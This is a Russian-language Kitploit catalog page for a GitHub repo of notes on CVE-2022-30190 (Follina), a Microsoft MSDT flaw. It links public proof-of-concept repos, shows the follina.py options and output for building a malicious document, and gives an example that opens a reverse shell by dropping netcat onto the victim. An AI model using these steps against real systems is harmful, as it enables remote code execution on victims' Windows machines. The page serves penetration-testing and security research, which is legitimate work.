Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Follina — Notes related to CVE-2022-30190 | Kitploit
Инструменты/GitHubGitHub/abhirules27/follina
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRed Teaming
GitHubabhirules27/follina

Follina

Notes related to CVE-2022-30190

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Follina

Заметки, связанные с CVE-2022-30190

FOLLINA: CVE-2022-30190

  1. Использует средство диагностики поддержки Microsoft (MSDT)

  2. Эксплуатирует окно диагностики, открытое для диагностики, и при правильном выполнении предоставляет обратную оболочку атакующему.

  3. Github: (a). https://github.com/JohnHammond/msdt-follina (b). https://github.com/chvancooten/follina.py

  4. Благодарности: (a). @_johnhammond (b). @networkchuck

  5. Использование follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT] options: -h, --help show this help message and exit --command COMMAND, -c COMMAND команда для выполнения на цели (по умолчанию: calc) --output OUTPUT, -o OUTPUT выходной вредоносный файл (по умолчанию: ./follina.doc) --interface INTERFACE, -i INTERFACE сетевой интерфейс или IP-адрес для размещения HTTP-сервера (по умолчанию: eth0) --port PORT, -p PORT порт для HTTP-сервера (по умолчанию: 8000)

  6. Примеры (a). Запуск calc.exe: $ python3 follina.py
    [+] copied staging doc /tmp/9mcvbrwo [+] created maldoc ./follina.doc [+] serving html payload on :8000 (b). Запуск notepad.exe: $ python3 follina.py -c "notepad" (c). Получить обратную оболочку на порт 9001. Примечание: это загружает бинарный файл netcat на жертву и помещает его в C:\Windows\Tasks. Он не удаляет бинарный файл. Это вызовет срабатывание антивируса, если антивирус не отключен. $ python3 follina.py -r 9001

Скачать инструмент